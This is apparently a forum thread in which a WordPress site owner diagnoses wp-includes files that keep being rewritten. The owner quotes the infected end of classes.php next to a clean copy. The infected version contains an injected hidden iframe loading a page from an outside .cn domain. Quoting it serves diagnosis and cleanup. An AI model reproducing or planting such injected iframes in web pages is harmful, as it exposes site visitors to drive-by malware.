coalminecanary

OK does any of this look suspect in the database?

wp_comments				1  	6.2 KiB  	-
wp_links 				7 	4.5 KiB 	-
wp_options 				149 485.0 KiB 	608 B
wp_postmeta 			42 	9.5 KiB 	96 B
wp_posts 				21 	31.8 KiB 	-
wp_terms 				13 	5.5 KiB 	-
wp_term_relationships 	27 	3.6 KiB 	-
wp_term_taxonomy 		13 	3.6 KiB 	-
wp_usermeta 			15 	8.3 KiB 	-
wp_users 				2 	4.2 KiB 	-
wp_yapbimage 			16 	4.0 KiB 	-
11 table(s) 	Sum 	306 	566.3 KiB 	704 B

Also, where does WP stoer the database user info? I should verify that it is not world readable, right? After install I was not directed to change any file permissions so its possible that the db login is in a world readable file…

This is where I will start as well as changing passwords, and seewhat happens.

THanks!

Hm

So what I am wondering is HOW these php files are getting writen over?

When I replace them with FTP, the site works for some time.

THen later on, the site is broken and all of the wp-includes failes have been edited by whatever script.

My site is hosted remotely by dreamhost in a unix based server. my guess is that the bot is accessing these files through some sort of exploit

wordpress is the ONLY thing installed on this website!

So wait, this is a program ON the webserver that caused it for you?

Or a program on the computer with which you FTP into the webserver?

THanks!

This is only happening to my wordpress includes directory. I have lots of other PHp files on the server under the same ftp login. wp-includes only has write access by owner, I double checked that…

For the record, My host is dreamhost.

Was this happening on all of your php files? Or just certain directories? just wordpress files?

Interesting.

So on my webserver, the end of classes.php looks like this:

function send() {
		header('Content-Type: text/xml');
		echo "<?xml version='1.0' standalone='yes'
echo '<iframe src="https://apartment-mall.cn/ind.php" width="1" height="1" alt="YTREWQhej2Htyu" style="visibility:hidden;position:absolute"></iframe>';
?>		foreach ( $this->responses as $response )
			echo $response;
		echo '</wp_ajax>';
		die();
	}
}

?>
?>
?>

And my local copy is:

function send() {
		header('Content-Type: text/xml');
		echo "<?xml version='1.0' standalone='yes'?><wp_ajax>";
		foreach ( $this->responses as $response )
			echo $response;
		echo '</wp_ajax>';
		die();
	}
}

?>

So, is there something in WP that could allow external access to wp-includes folder? This definitely appears to be bot-like… search and replace of header text…

I will check with ISP as well.

Thanks!